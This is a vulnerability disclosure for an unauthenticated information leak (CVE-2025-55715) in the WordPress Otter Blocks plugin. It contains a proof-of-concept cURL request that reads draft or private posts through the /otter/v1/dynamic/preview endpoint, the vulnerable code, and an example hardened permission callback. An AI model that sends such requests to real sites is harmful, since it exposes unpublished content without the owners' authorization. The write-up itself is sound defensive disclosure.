Summary
I recently discovered an unauthenticated sensitive information exposure vulnerability in the WordPress Otter Blocks plugin. It has been assigned CVE-2025-55715 and published in the Patchstack database. Over 300,000 websites were affected by this vulnerability.
The plugin exposes sensitive content because a dynamic content REST endpoint has no access restrictions. This should be considered a high-risk vulnerability, and affected sites should update immediately to avoid sensitive data leakage.
About The Plugin
Otter is a Gutenberg Blocks page builder plugin that adds extra functionality to the WordPress Block Editor (also known as Gutenberg) for a better page-building experience without the need for traditional page builders like Elementor and Divi.
| Plugin Name | Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE |
| Plugin Slug | otter-blocks |
| WP.org Profile | https://wordpress.org/plugins/otter-blocks |
| Active Installations | 300,000+ |
| Vulnerable Version | 3.1.0 (Download Here) |
| Patched Version | 3.1.1 (Download Here) |
| CVSS & Severity | High (7.5) |

🔧 Attack Scenario
Step 01:
Log in as an administrator. Install and activate the plugin.

Step 02:
As an Administrator:
- Create a new Post or Page.
- Set its status to Draft or Private.
- Save and note the Post ID (e.g., 71).

Step 03:
Send the following cURL request as an unauthenticated user, passing the previously noted Post ID in the context parameter:
curl 'http://example.com/wp-json/otter/v1/dynamic/preview?context=71&type=postExcerpt' \
--compressed \
-H 'Accept: application/json'
# Output: "This post is draft, by admin, id 71"

❗Vulnerable Code
Vulnerable File: wp-content/plugins/otter-blocks/inc/server/class-dynamic-content-server.php
register_rest_route(
    $namespace,
    '/dynamic/preview',
    array(
        array(
            'methods'             => \WP_REST_Server::READABLE,
            'callback'            => function( $request ) {
                return Dynamic_Content::instance()->apply_data( $request->get_params() );
            },
            'permission_callback' => function () {
                return true;
            },
        ),
    )
);
The permission_callback returns true unconditionally, meaning no user permission or authentication check is performed.
This allows anyone, even unauthenticated users, to send requests to this endpoint and extract private/draft post information.
Patch
The developers updated the permission_callback for the REST API endpoints. Now only public posts, and posts that the requesting user is allowed to edit, can be fetched through this endpoint.

This resolves the security vulnerability and ensures proper access control restrictions.
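To make the access-control rule concrete, the following is an added example (not Otter Blocks' actual patch) that replaces the unconditional permission_callback shown above with one enforcing the rule the patch describes: published posts of public post types are previewable by anyone, anything else only by a user who can edit that post. The function name otter_demo_preview_permission is hypothetical; the callback body is the page's own and assumes the plugin's Dynamic_Content class is in scope.

```php
<?php
// Added example, not the plugin's own code. Hardened permission_callback for
// the /otter/v1/dynamic/preview route: resolve the post named by the 'context'
// parameter and gate on its visibility plus the caller's capabilities.

function otter_demo_preview_permission( \WP_REST_Request $request ) {
    $post_id = absint( $request->get_param( 'context' ) );
    $post    = $post_id ? get_post( $post_id ) : null;

    if ( ! $post ) {
        return new \WP_Error( 'rest_post_invalid_id', 'Invalid post ID.', array( 'status' => 404 ) );
    }

    // A published post of a publicly viewable post type is already visible on the
    // front end, so previewing it reveals nothing new to an anonymous caller.
    if ( is_post_publicly_viewable( $post ) ) {
        return true;
    }

    // Drafts and private posts require edit rights on that specific post, which
    // WordPress grants only to authenticated users with a sufficient role.
    if ( current_user_can( 'edit_post', $post->ID ) ) {
        return true;
    }

    return new \WP_Error(
        'rest_forbidden',
        'Sorry, you are not allowed to preview this post.',
        array( 'status' => rest_authorization_required_code() ) // 401 anonymous, 403 logged in
    );
}

// Route registration wired to the hardened callback (hypothetical wiring).
add_action( 'rest_api_init', function () {
    register_rest_route(
        'otter/v1',
        '/dynamic/preview',
        array(
            'methods'             => \WP_REST_Server::READABLE,
            'callback'            => function ( \WP_REST_Request $request ) {
                return Dynamic_Content::instance()->apply_data( $request->get_params() );
            },
            'permission_callback' => 'otter_demo_preview_permission',
        )
    );
} );
```

With this in place, the unauthenticated cURL request from Step 03 against a draft post receives a 401 error body instead of the excerpt, while the same request for a published post still succeeds.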
Changelog:

Here is the link to the patched file: https://plugins.trac.wordpress.org/changeset/3342854/otter-blocks/tags/3.1.1/inc/server/class-dynamic-content-server.php?old=3194429&old_path=otter-blocks%2Ftrunk%2Finc%2Fserver%2Fclass-dynamic-content-server.php
Timeline
| Report Submitted To Patchstack | 03 August, 2025 |
| Vendor Contacted | 06 August, 2025 |
| Patch Submitted | 12 August, 2025 |
| Published | 27 August, 2025 |
Conclusion
Otter Blocks (version 3.1.0 and below) exposes sensitive data such as private or draft post content to unauthenticated users via the unprotected REST API endpoint /wp-json/otter/v1/dynamic/preview/.
This endpoint is improperly guarded and allows unauthenticated attackers to retrieve post titles, excerpts, content and other metadata — even for posts that are not publicly published (i.e., drafts or private posts).